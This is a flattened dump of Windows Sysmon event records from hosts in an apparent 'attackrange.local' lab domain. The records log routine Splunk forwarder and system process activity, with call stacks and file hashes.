07:42:52.221{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.221{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.221{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F27C-60EB-E07C-00000000CF01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.221{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27C-60EB-E07C-00000000CF01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.206{466BC892-F27C-60EB-E07C-00000000CF01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:52.189{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CD98C9B50EA4F93479F24949074D451,SHA256=58324A938ECED25000DC215294DCA4C57BA335A0B0C6A885057DEE00FB12EC40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805843Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:52.095{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71D04907AD989109179FB8FF57802D27,SHA256=C9C3F0E44D53323F8AEAAFF6719CA156C930194637A8CCF65AF6E41C19255546,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805844Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:53.126{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDCE8AD42BCC212E24D6D3436D3C2CC7,SHA256=6EA087A5962A6295FC47A15CE15617F6E0D61A6F57948700FEDFAAA1A503E668,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.906{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBF17196F7B9DF04D411031FA2BF4EBF,SHA256=C0BF0B2A3C9E70D4B798A8DC07F7177F02E4216CC73FACDB3A884348B105334F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.838{466BC892-F27D-60EB-E27C-00000000CF01}98729860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.591{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27D-60EB-E27C-00000000CF01}9872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.591{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.591{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.591{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.591{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.591{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F27D-60EB-E27C-00000000CF01}9872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.591{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27D-60EB-E27C-00000000CF01}9872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.586{466BC892-F27D-60EB-E27C-00000000CF01}9872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001045653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:44.726{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50884-false10.0.1.12-8000- 23542300x80000000000000001045652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.207{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F784B568FF47AE562B5E0C97D520ECB,SHA256=63C4903789D226D31FEAF6391D369533C77BEC7546EDDC84952847A06F7246D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:53.105{466BC892-F27C-60EB-E17C-00000000CF01}6404396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.287{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F27E-60EB-E37C-00000000CF01}10008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.285{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.285{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.285{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.285{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.284{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F27E-60EB-E37C-00000000CF01}10008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.268{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F27E-60EB-E37C-00000000CF01}10008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.269{466BC892-F27E-60EB-E37C-00000000CF01}10008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:54.237{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E96F3FA732FEC72B9A8490D99133E5CB,SHA256=C9EC1528FAC69EC3E6FE92A240E09B49B42F4A5EB676330082007B0F7E54F274,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805845Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:54.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F7AB012041B9CDD4363992534F46FA1,SHA256=0A3C235078E177A5C75FAB1866DBB9D102E0D5A8B0CABFCD35AFA04F92215541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:55.321{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=53BEE2455228E7E76FABC0E1A3E2AFB7,SHA256=C26A2F648414FCADA018328EB05251FCCEEBCA75B7571011BB11DE0A64158F57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:55.252{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ED315C1E58DB87C25F4DC53CB1A4C54,SHA256=C876E3871BCCDFF633FB2619F2C9DDF82025B7D89015DFCB4E98152954A77977,IMPHASH=00000000000000000000000000000000falsetrue 